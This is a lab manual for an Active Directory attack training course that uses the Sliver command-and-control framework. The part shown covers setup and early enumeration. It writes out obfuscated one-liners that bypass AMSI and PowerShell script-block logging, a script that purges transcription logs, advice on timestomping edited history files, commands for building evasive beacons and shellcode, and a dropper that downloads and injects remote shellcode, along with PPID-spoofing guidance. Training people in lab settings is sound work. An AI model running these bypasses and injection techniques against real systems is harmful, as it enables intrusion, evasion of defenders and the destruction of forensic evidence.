LabManual Sliver

CRTP Bootcamp with Sliver
Table of Contents
Introduction ........................................................................................................... 7
What is Sliver ............................................................................................................................................ 7
Features .................................................................................................................................................... 8
Dependencies ........................................................................................................................................... 8
Objective................................................................................................................ 9
Lab objective............................................................................................................................................. 9
Lab Prerequisites ...................................................................................................................................... 9
C2 and Attack Infrastructure ................................................................................ 11

Lab Defenses and Bypasses .................................................................................................................... 11
PSReadline Command History ............................................................................................................ 11
Script Block Logging............................................................................................................................ 11
Module Logging .................................................................................................................................. 12
System-Wide Transcription ................................................................................................................ 13
AntiMalware Scan Interface (AMSI) and Defender ............................................................................ 14
Automating PowerShell bypasses using Invisi-Shell........................................................................... 14
Sliver C2 Lab infrastructure .................................................................................................................... 16
Sliver C2 Setup.................................................................................................................................... 16
Beacon Operations ................................................................................................................................. 18
Process Injection and PPID selection ................................................................................................. 18
Tool execution .................................................................................................................................... 19
Enumeration using LDAP queries ....................................................................................................... 19
Foothold .............................................................................................................. 21
Using Process Injection to invoke shellcode remotely ....................................................................... 21
Analysis using Process Hacker ............................................................................................................ 23
Learning Objective 1 ............................................................................................ 24

Enumerating Users ................................................................................................................................. 24
Using StandIn ..................................................................................................................................... 24
Analysis using Process Hacker ............................................................................................................ 30
Using ADSearch .................................................................................................................................. 31
AlteredSecurity Attacking and Defending Active Directory 1

Enumerating Computers ........................................................................................................................ 33
Using StandIn ..................................................................................................................................... 33
Using ADSearch .................................................................................................................................. 34
Enumerating Domain Administrators ..................................................................................................... 35
Using StandIn ..................................................................................................................................... 35
Using ADSearch .................................................................................................................................. 36
Enumerating Enterprise Administrators ................................................................................................. 37
Using StandIn ..................................................................................................................................... 37
Using ADSearch .................................................................................................................................. 38

List all the OUs ........................................................................................................................................ 39
Using StandIn ..................................................................................................................................... 39
Using ADSearch .................................................................................................................................. 41
Enumerate DistinguishedName for StudentMachines OU ..................................................................... 42
Using StandIn ..................................................................................................................................... 42
Using ADSearch .................................................................................................................................. 43
List all the computers in the StudentMachines OU ................................................................................ 44
Using DSQuery.................................................................................................................................... 44
List the GPOs........................................................................................................................................... 46
Using StandIn ..................................................................................................................................... 46
Using ADSearch .................................................................................................................................. 47
Enumerate GPOs applied on the StudentMachines OU ......................................................................... 48
Using StandIn ..................................................................................................................................... 48
Using ADSearch .................................................................................................................................. 49

ACL for the Domain Admins group ......................................................................................................... 50
Using ADCollector............................................................................................................................... 50
All modify rights/permissions for studentX ............................................................................................ 52
Using ADCollector............................................................................................................................... 52

Enumerate all domains in the moneycorp.local forest .......................................................................... 53

Using DSQuery.................................................................................................................................... 53
Map the trusts of the dollarcorp.moneycorp.local domain ................................................................... 54
Using ADSearch .................................................................................................................................. 54
Map External trusts in moneycorp.local forest ...................................................................................... 55
Using ADSearch .................................................................................................................................. 55
Identify external trusts of dollarcorp domain ........................................................................................ 57
Using ADSearch .................................................................................................................................. 57
Enumerate Trusts of a trusting forest .................................................................................................... 58
Using ADSearch .................................................................................................................................. 58

Enumerating the vulnerable service....................................................................................................... 59
Using SharpUp .................................................................................................................................... 59
Using Seatbelt and Stracciatella ......................................................................................................... 61
Elevate privileges to local administrator ................................................................................................ 63
Using Remote-sc-* ............................................................................................................................. 63
Identify where studentX has local administrative access....................................................................... 67
Using LACheck .................................................................................................................................... 67
Command Execution using WMI ........................................................................................................ 68
Command Execution using Winrm ..................................................................................................... 71
Lateral Movement using Sa-sc-enum and Scshell .............................................................................. 71
Abuse Jenkins to get admin access on the dcorp-ci server .................................................................... 74
Using Process Injection to invoke remote shellcode ......................................................................... 74

BloodHound Enumeration ...................................................................................................................... 82
Using SharpHound.exe ....................................................................................................................... 82
Using LACheck .................................................................................................................................... 86
Issue with Derivate Local Admin and BloodHound 4.2.0 ................................................................... 88
Identify where studentX has local administrative access....................................................................... 89

Identify a Domain Admin session ........................................................................................................... 90
Using LACheck .................................................................................................................................... 90

Escalate privileges to Domain Admin: using dcorp-ci............................................................................. 92
Using Remote-sc-*, Sa-sc-enum, Scshell and PEzor ........................................................................... 92
Escalate privileges to Domain Admin: via derivative admin ................................................................ 101
Using scshell, PEzor & Rubeus .......................................................................................................... 101
Learning Objective 8 .......................................................................................... 105

Extract secrets from the domain controller of dollarcorp.................................................................... 105
Using PEzor, Rubeus and Remote-sc-*............................................................................................. 105
Create and abuse a Golden ticket ........................................................................................................ 111
Using PEZor and Rubeus................................................................................................................... 111
Learning Objective 9 .......................................................................................... 116

Command execution on dcorp-dc via HOST service............................................................................. 116
Using Rubeus, PEzor and Sa-schtasksenum ..................................................................................... 116
Command execution on dcorp-dc via WMI service.............................................................................. 118
Using Rubeus and sharp-wmi ........................................................................................................... 118
Learning Objective 10 ........................................................................................ 120

Execute the Diamond Key attack .......................................................................................................... 120
Using Rubeus .................................................................................................................................... 120

Abuse the DSRM credential for persistence ......................................................................................... 122
Using PEzor, and Remote-sc-* ......................................................................................................... 122

Check if studentX has DCSync rights .................................................................................................... 128
Using StandIn ................................................................................................................................... 128
Add DCSync rights for studentX and execute the attack ...................................................................... 129
Using StandIn and PEzor................................................................................................................... 129

Modify security descriptors on dcorp-dc to get access using PSRemoting and WMI .......................... 133
Using PS2EXE, Sharp-wmi, RACE and Stracciatella........................................................................... 133
Execute a Silver Ticket attack to get code execution with WMI .......................................................... 138
Using RACE, PS2EXE, Rubeus and Sharp-WMI ................................................................................. 138

Perform the Kerberoast attack ............................................................................................................. 143
Using StandIn, Rubeus and Hashcat ................................................................................................. 143

Find a server where Unconstrained Delegation is enabled.................................................................. 146
Using StandIn ................................................................................................................................... 146
Using ADSearch ................................................................................................................................ 147
Compromise the server and escalate to Domain Admin privileges ..................................................... 148
Using SharpSecDump, Rubeus, LACheck, SpoolSample and Scshell ................................................ 148
Escalation to Enterprise Admins ........................................................................................................... 155
Using Rubeus, SpoolSample, PEzor and Scshell ............................................................................... 155

Constrained Delegation user enumeration .......................................................................................... 158
Using StandIn ................................................................................................................................... 158
Using ADSearch ................................................................................................................................ 159
Constrained Delegation user abuse...................................................................................................... 160
Using Rubeus .................................................................................................................................... 160
Constrained Delegation computer enumeration ................................................................................. 162
Using StandIn ................................................................................................................................... 162
Using ADSearch ................................................................................................................................ 163
Constrained Delegation computer abuse ............................................................................................. 164
Using Rubeus .................................................................................................................................... 164

Enumerate a Computer Object with Write permissions ...................................................................... 166
Using StandIn ................................................................................................................................... 166
Using Get-RBCD-Threaded ............................................................................................................... 167
Abuse a Computer Object with Write permissions .............................................................................. 168
Using StandIn, PEzor, Rubeus........................................................................................................... 168

Escalate to Enterprise Admin using the domain trust key ................................................................... 174
Using PEzor & Rubeus ...................................................................................................................... 174

Escalate privileges to Enterprise Admin using krbtgt hash .................................................................. 180
Using PEzor and Rubeus ................................................................................................................... 180

Access the SharedwithDCorp share on eurocorp.local ........................................................................ 184
Using PEzor, Sa-Netshares, & Rubeus .............................................................................................. 184

Enumerating AD CS ............................................................................................................................... 189
Using Certify ..................................................................................................................................... 189
Privilege Escalation to DA and EA using ESC1....................................................................................... 191
Using Certify, Openssl and Rubeus .................................................................................................. 191
Privilege Escalation to DA and EA using ESC3....................................................................................... 197
Using Certify, Openssl and Rubeus .................................................................................................. 197

Enumerating SQL Server and Links................................................................................................... 204
Using SharpSQL ................................................................................................................................ 204
Exploiting SQL Server links.................................................................................................................... 208
Using PS2EXE, PowerUpSQL ............................................................................................................. 208
Resources and Tools .......................................................................................... 211

Closing Note....................................................................................................... 213

Introduction
What is Sliver
Sliver is primarily an Open-Source command-line interface (CLI) Command and Control (C2) framework
built for Adversary Simulation. Sliver Implants support multiple architectures and Operating Systems.
Sliver also supports multiple egress C2 call-back protocols such as DNS, mTLS, WireGuard, and HTTP(S).
Sliver has the multiplayer option to allow multiple operators to simultaneously command your C2
server. Apart from this Sliver is constantly being updated, maintained and contributed to by the
community.
To understand Sliver further refer to its official documentation here.
“Bred as living shields, these slivers have proven unruly-they know they cannot be caught.”

Features
• Dynamic code generation

• Compile-time obfuscation
• Multiplayer-mode
• Staged and Stageless payloads
• Procedurally generated C2 over HTTP(S)
• DNS canary blue team detection
• Secure C2 over mTLS, WireGuard, HTTP(S), and DNS
• Fully scriptable using JavaScript/TypeScript or Python
• Windows process migration, process injection, user token manipulation, etc.
• Let’s Encrypt integration
• In-memory .NET assembly execution
• COFF/BOF in-memory loader
• TCP and named pipe pivots
Dependencies
Ideally, we need to use a Linux machine as the authors recommend to run the Sliver server on
Linux/MacOS (any OS except windows). We will be using Kali Linux for this lab.
Recommended/Optional Dependencies include mingw-w64 & Metasploit for using all capabilities of
the Sliver C2.

Objective
Lab objective
The goal of this lab manual is to operate with the Sliver C2 in the CRTP lab. We perform all lab tasks with
a good sense of endpoint OPSEC by avoiding the usage of PowerShell directly, bypassing lab defenses
and performing in-memory execution. We will utilize some new/latest tools for various activities such as
Enumeration, Lateral Movement, etc.
Lab Prerequisites
Use a web browser or the OpenVPN client to connect to the lab. See the “Connecting to lab” document
for more details.
All the tools used in the course are available in C:\AD\Tools on your foothold machine. Feel free to
upload and test out tools of your choice.
There is no internet access except to https://portal.azure.com/ to avoid deliberate or accidental

misuse.
The lab manual uses terminology for user specific resources. For example, if you see studentx and your
user ID is student25, read studentx as student25 and so on.
PPID/PIDs will be different on each lab machine & might change on every startup, so perform Process
Injection appropriately.
Reboot the Foothold VM to try a quick fix if you find issues while performing ticket-based attacks using
tools like Rubeus.
Some tools may not produce desired output because of prior impersonation attacks, spawn new Sliver
sessions to avoid such issues.
Note the following details before you begin the lab:
• Foothold VM: dcorp-stdX -- 172.16.100.X

• Foothold User: dcorp\studentX
Except the foothold machine dcorp-stdx, all other machines in the lab are reverted daily to revert to
their original known state. Make sure to save all your notes offline.
Windows Subsystem for Linux - WSL Ubuntu Core 20.04 is installed on dcorp-stdx to simulate Sliver
operations from Linux.
While copying code / commands from the lab manual, be sure to replace usernames, AES / RC4 keys etc.
in accordance with your lab instance. To Copy content, use standard CTRL + C and to Paste try CTRL + V
or Right Click (WSL Ubuntu app requires Right Click to paste).

Use this credential (WSLToTh3Rescue!) if there is a need to escalate to root on dcorp-stdx – Ubuntu
WSL.
WSL Ubuntu can be spawned from the Windows Terminal or the Ubuntu WSL app as follows.
• Spawn WSL using Ubuntu App: (Try Right Click to Paste clipboard)
• Spawn Ubuntu WSL from Windows Terminal: (Try CTRL + V to Paste clipboard)
NOTE: Since WSL is installed and sudo privileges are provided, WSL can be abused for privilege escalation
on dcorp-stdx. However, since AD abuse is the primary focus of this course, we disregard this escalation
path.

C2 and Attack Infrastructure
Lab Defenses and Bypasses
PSReadline Command History
The module PSReadline has been used for a long time now, amongst other things it gives users a Unix
like command line experience, including Command History Reuse with CTRL + R. PSReadline stores
command history in a file for reuse between sessions. This can be a forensic artifact for any commands
physically typed at the console. It can be easily bypassed.
Use the Get-PSReadlineOption and note the HistorySavePath property value. This file contains the
PowerShell command history.
PS C:\> (Get-PSReadlineOption).HistorySavePath
C:\Users\studentX\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\Con
soleHost_history.txt
To search a pattern across all history files of all users run the following command in an elevated shell.
PS C:\> Select-String -Path C:\Users\*\AppData\Roaming\Microsoft\Windows\Powe
rShell\PSReadline\*. txt -Pattern 'mimikatz'
Bypass PSReadline by removing its functionality using the following command for the current session.
PS C:\> Remove-Module PSReadline
An alternative would be to modify the ConsoleHost_history.txt file by removing/altering only performed

malicious activity from the file and using tools like SharpStomp to timestomp the file back to its original
modified date.
Script Block Logging

Script block logging logs contents of all the script blocks processed by the PowerShell engine regardless
of the host used. Longer scripts will be split between multiple 4104 events with the same ScriptBlock ID.
If you enable Invocation Logging, then 4105 will indicate the beginning of a session and 4106 the end of
a session. Due to the logging volume Invocation Logging is usually not enabled.
We can use either Windows Event Viewer or PowerShell in this case to see if you can find the Add-Type
command in the Microsoft-Windows-PowerShell/Operational log under event ID 4104.
PS C:\> Get-WinEvent -LogName 'Microsoft-Windows-PowerShell/Operational' -Fil
terXPath '*[System[(EventID=4104)]]' -MaxEvents 5 | Format-Table TimeCreated,
Message -Wrap
To Bypass Script Block logging, we can use the following one-liner:

PS C:\> [Reflection.Assembly]::"lòÀdwIThPa`RtiÀlnamE"(('S'+'ystem'+'.C'+'o
re'))."gÈ`TTYPE"(('Sys'+'tem.Di'+'agno'+'stics.Event'+'i'+'ng.EventProv'+'i'
+'der'))."gET`FIèLd"(('m'+'_'+'enabled'),('NonP'+'ubl'+'ic'+',Instance'))."s
eTVa`lÙe"([Ref]."a`sSem`BlY"."gE`T`TyPE"(('Sys'+'tem'+'.Mana'+'ge'+'ment.Aut
'+'o'+'mation.Tracing.'+'PSEtwLo'+'g'+'Pro'+'vi'+'der'))."gEtFIe`Ld"(('e'+'tw
'+'Provid'+'er'),('N'+'o'+'nPu'+'b'+'lic,Static'))."gE`Tva`lUe"($null),0)
As before this works for the current session.
Execute the sbloggingbypass.ps1 one-liner and verify that the bypass works after execution as follows.
PS C:\> C:\AD\Tools\sbloggingbypass.ps1
PS C:\> Get-WinEvent -FilterHashtable @{ProviderName="Microsoft-Windows-Power
Shell"; Id=4104} | Measure | % Count
6
# Test Command that generates a 4104 event

PS C:\> Get-Module -ListAvailable | Format-Table Name, LogPipelineExecutionDe
tails
PS C:\> Get-WinEvent -FilterHashtable @{ProviderName="Microsoft-Windows-Power

Shell"; Id=4104} | Measure | % Count
6
Module Logging
This feature was introduced in Windows PowerShell 3.0 that logs pipeline execution and command
execution events. It is entirely dictated by the LogPipelineExecutionDetails property of the module.
Module logging appears in two places, we will be focusing on PowerShell 5.0:
PowerShell 5.0:
PS C:\> Get-WinEvent -LogName “windows Powershell”
While enumerating PowerShell event logs, we notice that modules have a property called
LogPipelineExecutionDetails which by default is set to “False”, the ones set to “True” have module
logging enabled.
PS C:\> Get-Module -ListAvailable | Format-Table Name, LogPipelineExecutionDe
tails
Name LogPipelineExecutionDetails
---- ---------------------------
Microsoft.PowerShell.Operation.Validation False
PackageManagement False
Pester False
PowerShellGet False
[.......snip......]

To bypass module logging we can modify the setting of the enabled modules and set it to false. Some
commandlets like Get-Command use the Microsoft.Powershell.Core PowerShell snap-in that is still used
by modern PowerShell. To disable module logging for the core PowerShell commands, we need to run
the following commands.
PS C:\> Get-WinEvent -LogName “windows Powershell” | Measure | % Count
7
PS C:\> $module = Get-Module Microsoft.PowerShell.Utility
PS C:\> $module.LogPipelineExecutionDetails = $false
PS C:\> $Snapin = Get-PSSnapin Microsoft.PowerShell.Core
PS C:\> $Snapin.LogPipelineExecutionDetails = $false
# Test Command for Module Log

PS C:\> Get-Command
PS C:\> Get-WinEvent -LogName “windows Powershell” | Measure | % Count
7
After executing the above command, we couldn’t find any additional 4103 event logs.
System-Wide Transcription
The Start-Transcript cmdlet Enables transcription (console logging) for everything (powershell.exe,
PowerShell ISE, custom hosts - .NET DLL, msbuild, installutil etc.) which uses the PowerShell engine
(System.Management.Automation NameSpace/dll). Windows PowerShell 5.0 introduced nested and
system-wide transcription capabilities. This policy will automatically record all commands and output
them into log files in a directory that you specify. The directory should be created automatically.
A threat actor could simply delete transcript files to cover their tracks if the log path isn’t obscure and
there are no access controls to harden the path.
Here is a snippet to read the Transcription Logging Path from the registry and purge all transcript files.
PS C:\> $basePath = "HKLM:\Software\Policies\Microsoft\Windows\PowerShell\Tra
nscription"
if(Test-Path $basePath) {
$a = Get-ItemProperty $basePath -Name OutputDirectory | Select-Object -Ex
pandProperty OutputDirectory
If (!$?) {'Not Configured'} Else {
If (Test-Path -Path $a) {
Get-ChildItem -Path $a -Recurse |
Remove-Item -Force -Confirm:$false -Recurse
} Else {
'Log path not found.'
}
}
} Else {
'Not Configured'
}

An alternative would be to modify the transcript files removing/altering only performed malicious
activity from the files and using tools like SharpStomp to timestomp the file back to its original
modified date.
AntiMalware Scan Interface (AMSI) and Defender

Microsoft Defender is an antivirus component of Microsoft Windows. It mainly uses static signatures
and heuristic analysis to alert for malicious files on disk.
Antimalware Scan Interface (AMSI) is ideally used to integrate applications and services with
antimalware products that provide enhanced malware protection. AMSI, allows detection of malicious
scripts regardless of input method (disk, encodedcommand, in-memory) and the provides registered
antivirus access to contents of a script before execution. You will find these alerts in the log Microsoft-
Windows-Windows Defender/Operational with event ID 1116 and 1117.
Using either Windows Event Viewer or in this case PowerShell we can find flagged sources like the
Invoke-Mimikatz command in the Microsoft-Windows-Windows Defender/Operational log under event
IDs 1116 or 1117.
PS C:\> Get-WinEvent -LogName 'Microsoft-Windows-Windows Defender/Operational
' -FilterXPath "*[System[((EventID=1116) or (EventID=1117))]]" -MaxEvents 5 |
Format-Table TimeCreated, Message -Wrap
We should use an AMSI Bypass that itself isn’t detected by defender. Some useful sources are Amsi-
Bypass-Powershell and amsi.fail. We can obfuscate the original AMSI bypass script by leveraging
tools such as Invoke-Obfuscation and chameleon to bypass detections. We will use the following
obfuscated bypass to bypass AMSI during the lab.
PS C:\> SèT-Itèm ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TY
pE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varIÀ`BLE ( ('1Q'+'2U') +'zX' )
-VaL )."A`ssÈmbly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A
',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em'
) ) )."gètfìElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),
( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T
`VaLUE"( ${nÙLl},${t`RuE} )
Automating PowerShell bypasses using Invisi-Shell

Invisi-Shell is a tool to bypass AMSI, ScriptBlock Logging, System Wide Transcript and Module Logging at
startup by hooking .NET assemblies. This tool can help perform the same PowerShell Bypasses in an
easier and automated fashion.
Run either of the batch files depending on if you have local administrator privileges or not:
RunWithPathAsAdmin.bat or RunWithRegistryNonAdmin.bat.
# Using non-admin privileges
PS C:\> C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

# Using admin privileges
PS C:\> C:\AD\Tools\InviShell\RunWithPathAsAdmin.bat

Sliver C2 Lab infrastructure
For this lab we set up Sliver on WSL. We use version v1.5.41 from the official release page.
All that is needed to host Sliver is the sliver-server_linux (C2 Server) and the sliver-client_linux (C2
multiplayer client) binaries.
The student-VM (dcorp-stdX) is used as an initial foothold (via an assumed breach scenario) and is used
to pivot onto other machines via pivots.
Only dcorp-stdX connects back to the Sliver C2 via HTTPS and all other lab machines connect back to
send C2 traffic to dcorp-stdX via TCP pivots which ultimately is relayed back by the foothold HTTPS
channel onto the Sliver C2.
Sliver C2 Setup
Sliver has been downloaded and is located at C:\AD\Tools\Sliver. Corresponding Defender Exceptions
have been added for successful compilation of beacons and implants.
Spawn a WSL Ubuntu prompt. Execute the sliver-server executable to start the Sliver C2 server.
wsluser@dcorp-studentX:~$ cd /mnt/c/AD/Tools/Sliver
wsluser@dcorp-studentX:/mnt/c/AD/Tools/Sliver$ sudo ./sliver-server_linux
[sudo] password for wsluser: WSLToTh3Rescue!
Sliver supports multiple egress callback protocols like mTLS, DNS and HTTPS. In this case we use HTTPS
for egress callbacks. Start a HTTPS listener to listen on port 443 for C2 traffic.
NOTE: It is possible to use custom certificates for HTTPS encryption. List active egress listeners using the
jobs command.
[server] sliver > https
[*] Starting HTTPS :443 listener ...

[*] Successfully started job #2
Generate a HTTPS Portable Executable (exe) beacon with basic obfuscation features enabled (-e).
[server] sliver > generate beacon -b https://172.16.100.X -e -f exe -N dcorp-
std_https
[*] Generating new windows/amd64 beacon implant binary (1m0s)

[*] Symbol obfuscation is enabled
[*] Build completed in 2m0s
[*] Implant saved to /mnt/c/AD/Tools/Sliver/dcorp-std_dcorp-std_https.exe
generate:
-e: enable evasion features
-b: http(s) connection strings

-f: Specifies the output formats
-N: Agent name
Similarly, generate HTTPS beacon shellcode with basic obfuscation features enabled.
[server] sliver > generate beacon -b https://172.16.100.X -e -f shellcode -N
dcorp-std_https
[*] Generating new windows/amd64 beacon implant binary (1m0s)

[*] Build completed in 00:00:38
? Encode shellcode with shikata ga nai? Yes
[*] Encoding shellcode with shikata ga nai ... success!
[*] Implant saved to /mnt/c/AD/Tools/Sliver/dcorp-std_dcorp-std_https.bin
Setup a python3 / HFS webserver on port 80 from a new Ubuntu prompt to deliver all tools, shellcode
and payloads onto the target environment from /mnt/c/AD/Tools/Sliver.
wsluser@dcorp-studentX:~$ sudo python3 -m http.server 80

Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Beacon Operations
Process Injection and PPID selection
Sliver supports a variety of process injection methods and supports execute-assembly (uses the fork and
run technique, which is to spawn a new sacrificial process, inject your post-exploitation malicious code
into that new process, execute our malicious code and when finished, kill the new process) to execute
external tools like StandIn in the memory of seemingly benign processes. We will be using these
methods to perform C#/.NET compatible tool execution in memory throughout the lab.
Commonly abused processes for process injection are as follows.

• lsass.exe (credential theft)
• calc.exe (evasion)
• notepad.exe (evasion)
• svchost.exe (evasion)
• backgroundtaskhost.exe (application control bypass)
• dllhost.exe (commonly used to host COM components, adversaries often inject into this process in
order to blend in to a process that executes often and is expected to have a short lifetime).
• regsvr32.exe (application control bypass and other evasion)
• searchprotocolhost.exe (application control bypass and other evasion).
• werfault.exe (evasion)
• wuauclt.exe (evasion)
• spoolsv.exe (evasion)
PPID spoofing is a technique that allows attackers to start programs with an arbitrary parent process
set. This helps attackers make it look as if their programs were spawned by another process (instead of
the one that would have spawned it if no spoofing was done) and it may help evade detections, that are
based on parent/child process relationships.
• Illegitimate and unlikely parent/child relationships can help in detection, for example
WINWORD.exe spawning a malicious rundll32.exe/cmd.exe is suspicious and a potential IOC.
• We can abuse legitimate parent/child process relationships to blend in and stay hidden for better
OPSEC. Analyzing with Process Hacker we see a common legitimate relationship with svchost.exe
launching RuntimeBroker.exe / sihost.exe / taskhostw.exe / SearchUI.exe etc. We will impersonate
such legitimate relationships to execute our injection tasks from to stay hidden.

Tool execution
Sliver has inbuilt modules to perform common beacon tasks and exploitation. Apart from inbuilt
modules, Sliver has an armory from which commonly used exploitation tools can be downloaded and
used as in-built commands/modules.
Any other external tool that is a .NET assembly can be executed via execute-assembly and inline-
execute-assembly (Not all .NET assemblies are necessarily compatible).
execute-assembly built into Sliver allows both remote process injection via fork and run methods with
appropriate PPID spoofing along with Self-Process injection. Self-process injection supports usage of the
inbuilt AMSI and ETW bypasses.
inline-execute-assembly like execute-assembly built into Sliver was mainly created for Self-Process
injection to avoid the Fork and Run execution technique.
Enumeration using LDAP queries

Parts of the domain enumeration process are performed using raw LDAP queries. To understand LDAP
queries and their syntax look at this blog by Microsoft:
https://social.technet.microsoft.com/wiki/contents/articles/5392.active-directory-ldap-
syntax-filters.aspx
Here is a useful cheat sheet for the most popular LDAP queries and syntax:
https://gist.github.com/jonlabelle/0f8ec20c2474084325a89bc5362008a7
Under the hood most tools use LDAP queries and understanding them helps to perform active directory
enumeration/exploitation better. It gives the user the power to write custom LDAP searches if needed.
Since PowerView/SharpView are detected in the modern day, a suitable replacement to perform most
of their enumeration functionality is by using a tool that supports custom LDAP queries like StandIn and
ADSearch.

A good way to understand what LDAP queries are performed by a tool is to turn on the verbosity flag
and look for what LDAP queries the tool makes such as the follows.
[server] sliver (dcorp-std_https) > execute-assembly -t 80 '/mnt/c/AD/Tools/S
harpView.exe' 'Get-DomainSID -verbose'
[*] Output:
[Get-DomainSearcher] search base: LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/
DC=DOLLARCORP,DC=MONEYCORP,DC=LOCAL
[Get-DomainComputer] Using additional LDAP filter: (userAccountControl:1.2.84
0.113556.1.4.803:=8192)
[Get-DomainComputer] Get-DomainComputer filter string: (&(samAccountType=8053
06369)(userAccountControl:1.2.840.113556.1.4.803:=8192))
S-1-5-21-1874506631-3219952063-538504511
NOTE: Any tool that consecutively performs LDAP queries will cause alerts over protections like MDI and
ATP. In a real engagement it would be advised to perform such enumeration over long time intervals.

Foothold
Using Process Injection to invoke shellcode remotely
Assuming we have access to the foothold VM - dcorp-stdX (172.16.100.X) via assumed breach, we will
leverage Sliver on the same machine to gain a foothold beacon.
We can use a PE Loader to perform Process Injection into a target process by downloading/invoking
remotely hosted shellcode. We will be using a dropper that leverages NtAPIs to avoid detections called
NtDropper (currently closed source) to perform this using the already generated dcorp-std_https.bin
shellcode hosted using the python3/HFS webserver.
Execution Flow: NtDropper Dropper --> Invoke shellcode --> ProcessInjection
Begin by using the NtDropper dropper to invoke the shellcode hosted locally as follows.
PS C:\AD\Tools> C:\AD\Tools\NtDropper.exe
Usage: <IP or H0stname> <sh3llcod3>
PS C:\AD\Tools> C:\AD\Tools\NtDropper.exe 172.16.100.X dcorp-std_https.bin

[+] Stealth mode: Unhooking one function
[+] Creating new process in debug mode
[+] Found LdrLoadDllAddress address: 0x00007FFCBAD74840
[+] Setting HWBP on remote process
[+] Breakpoint Hit!
[+] Copying clean ntdll from remote process
[+] Found ntdll base address: 0x00007FFCBAD40000
[STEALTH] Function Name : NtAllocateVirtualMemory
[STEALTH] Address of Function: 0x0000019C7B2404C0
[+] Unhooked
Back on our python3 / HFS webserver we see a web request invoking dcorp-std_https.bin.
wsluser@dcorp-studentX:/mnt/c/AD/Tools/Sliver$ sudo python3 -m http.server 80
172.16.100.X - - [01/Jan/2024 05:10:02] "GET /dcorp-std_https.bin HTTP/1.1" 2
00 -

In our Sliver terminal we see a new beacon spawned as follows with no new detections.
List all beacons using the beacons command. To interact/use a beacon, select the appropriate beacon by
using the use command with its corresponding beacon ID.
Note: beacons regularly check-in after a suitable sleep interval unlike Sliver interactive sessions which
interact in Realtime.
[server] sliver > beacons
3a53f558 dcorp-std_https http(s) dcorp-studentX dcorp\st
udentX windows/amd64 14s 1m2s
[server] sliver > use 3a53f558

[*] Active beacon dcorp-std_https (3a53f558-9720-489c-9607-52ca462e8407)
We can start a Session Implant using the interactive command to interact with the host in Realtime.
Interact with a session using the -i argument.
Note: This is different from the shell command which spawns a shell and isn’t OPSEC safe
[server] sliver (dcorp-std_https) > interactive
[*] Using beacon's active C2 endpoint: https://172.16.100.X
[*] Tasked beacon dcorp-std_https (56cb1350)
[*] Session 44f1c601 dcorp-std_https - 172.16.100.X:61263 (dcorp-studentX) -
windows/amd64 - Tue, 02 Jan 2024 04:28:12 PST
[server] sliver (dcorp-std_https) > sessions -i 44f1c601

[*] Active session dcorp-std_https (44f1c601)
We can use the armory install command to install external tools/modules, an example is shown below.

[server] sliver (dcorp-std_https) > armory install sharpup
[*] Installing alias 'SharpUp' (v0.0.1) ... done!
Analysis using Process Hacker

Analyzing the execution on dcorp-stdX using Process Hacker (found at C:\AD\Sliver
Tools\processhacker-2.39\x64) we see that the Sliver beacon shellcode is injected into the
taskhostw.exe process with a PID: 2128.
Examine the beacon RuntimeBroker.exe process and the modules tab to find amsi.dll is loaded in the
current process.

Learning Objective 1
Enumerate following for the dollarcorp domain:
• Users
• Computers
• Domain Administrators
• Enterprise Administrators
Enumerating Users
Using StandIn
We begin the enumeration phase using the dcorp-stdX foothold session.
We enumerate users using StandIn along with the execute-assembly command to execute StandIn in
memory along with PPID spoofing.
• execute-assembly supports injection into a remote hosting process and injection into the current
sliver process (Self-injection). Apart from this it supports an in-built Amsi Bypass (-M) and ETW
Bypass (-E) when performing Self-injection (-i).
• To begin using execute-assembly along with our tools we need to find a suitable parent process to
fork and run a child process under. We will use the previously used beacons (RuntimeBroker.exe)
parent process (Svchost.exe, PID: 3476) to spawn a child process (taskhostw.exe) and inject our
.NET tooling for successful PPID spoofing.
If we would want to spawn under another parent process, we can enumerate processes using the ps
command as follows.
[server] sliver (dcorp-std_https) > ps -e svchost.exe
Pid Ppid Owner Arch Executable Session

====== ====== ================== ======== ============= =========
692 600 svchost.exe -1

2396 600 dcorp\studentX x86_64 svchost.exe 2
ps:
-e, --exe string filter based on executable name
To begin enumerating all users we can use LDAP queries to query all objects and their properties (refer
here to understand LDAP queries) using the --ldap option followed by the query:
(&(objectCategory=person)(objectClass=user)). This LDAP query filters for objects with a matching
Object Category property as person and Object Class property as user which in short queries all USER
OBJECT types and their respective properties.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'c:\windows\S
ystem32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/StandIn.exe' '--ldap "(&(object
Category=person)(objectClass=user))"'
[*] Output:
[?] Using DC : dcorp-dc.dollarcorp.moneycorp.local
[+] LDAP search result count : 97

|_ Result limit : 50
[?] Iterating result properties
[?] Object : CN=Administrator

Path : LDAP://CN=Administrator,CN=Users,DC=dollarcorp,DC=moneycorp,DC
=local
[+] logoncount
|_ 65535
[+] codepage
|_ 0
[+] objectcategory
|_ CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
[+] description
|_ Built-in account for administering the computer/domain
[+] usnchanged
|_ 3404228

[+] instancetype
|_ 4
[+] name
|_ Administrator
[+] badpasswordtime
|_ 9/15/2022 10:57:35 AM UTC
[+] pwdlastset
|_ 2/17/2019 5:14:11 AM UTC
[+] objectclass
|_ top
|_ person
|_ organizationalPerson
|_ user
[+] badpwdcount
|_ 0
[+] samaccounttype
|_ SAM_NORMAL_USER_ACCOUNT
[..................snip...................]
execute-assembly:
-t, --timeout command timeout in seconds (default: 60)
-p, --process string hosting process to inject into
-P, --ppid uint parent process id (optional) (default: 0)
StandIn:
--ldap LDAP filter, can return result collection
--filter Filter results, varies based on module
--limit Limit results, varies based on module, defaults:50
We can optionally return specific properties of the queried object like the samccountname property
using the --filter argument and limit the results displayed using the --limit argument.
We can perform an AMSI and ETW bypass with execute-assembly using the -M and -E flags. Showcasing
